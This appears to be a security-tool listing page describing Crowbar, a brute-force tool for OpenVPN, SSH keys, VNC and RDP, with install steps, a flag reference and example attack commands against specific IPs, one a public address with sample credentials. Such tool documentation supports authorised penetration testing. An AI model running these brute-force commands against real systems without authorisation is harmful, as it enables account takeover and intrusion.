Web Application Brute Force Attack: Crowbar

2014-12-26T20:58:02
ID N0WHERE:25511
Type n0where
Reporter N0where
Modified 2014-12-26T20:58:02

Description

Web Application Brute Force Attack

Crowbar was developed to brute force some protocols in a different manner then other ‘popular’ brute forcing tools. As an example, while most brute forcing tools use username and password for SSH brute forcing, Crowbar uses SSH keys.

Currently Crowbar supports

  • OpenVPN
  • SSH private key authentication
  • VNC key authentication
  • Remote Desktop Protocol (RDP) with NLA support

Installation

First you shoud install dependencies

 # apt-get install openvpn freerdp-x11 vncviewer

Then get latest version from github

 # git clone https://github.com/galkan/crowbar

Usage

  • -h : Shows help menu.
  • -b : Target service. Crowbar now supports vnckey, openvpn, sshkey, rdp.
  • -s : Target ip address.
  • -S : File name which is stores target ip address.
  • -u : Username.
  • -U : File name which stores username list.
  • -n : Thread count.
  • -l : File name which stores log. Deafault file name is crwobar.log which is located in your current directory
  • -o : Output file name which stores the successfully attempt.
  • -c : Password.
  • -C : File name which stores passwords list.
  • -t : Timeout value.
  • -p : Port number
  • -k : Key file full path.
  • -m : Openvpn configuration file path
  • -d : Run nmap in order to discover whether the target port is open or not. So that you can easily brute to target using crowbar.
  • -v : Verbose mode which is shows all the attempts including fail.

Web Application Brute Force Attack: Crowbar documentation

Examples:

Brute forcing RDP

RDP brute force attempt to a single IP address using a single username and a single password:

crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456

Brute forcing SSH

SSH key brute force attempt to a single IP address using a single username and a ssh key:

crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/id_rsa

Brute forcing VNC server

VNC brute force attempt to a single IP address using a passwd file with specified port number:

crowbar.py -b vnckey -s 192.168.2.105/32 -p 5902 -k /root/.vnc/passwd

Brute forcing OpenVPN

VPN brute force attempt to a single IP address using a configuration file, a certificate file, a single username and a sindle password with specified port number:

crowbar.py -b openvpn -s 198.7.62.204/32 -p 443 -m /root/Desktop/vpnbook.ovpn -k /root/Desktop/vpnbook_ca.crt -u vpnbook -c cr2hudaF

Source && Download

Web Application Brute Force Attack: Crowbar download